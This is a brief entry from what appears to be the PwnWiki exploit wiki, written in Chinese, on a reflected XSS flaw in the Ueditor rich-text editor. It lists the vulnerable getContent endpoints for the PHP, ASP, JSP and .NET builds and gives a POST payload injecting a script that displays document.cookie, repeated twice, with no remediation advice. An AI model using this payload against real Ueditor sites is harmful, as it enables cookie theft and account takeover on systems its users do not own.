Ueditor 反射型XSS漏洞
From PwnWiki
漏洞位置
/php/getContent.php /asp/getContent.asp /jsp/getContent.jsp /net/getContent.ashx
XSS
POST:
myEditor=<script>alert(document.cookie)</script>
/php/getContent.php /asp/getContent.asp /jsp/getContent.jsp /net/getContent.ashx
POST:
myEditor=<script>alert(document.cookie)</script>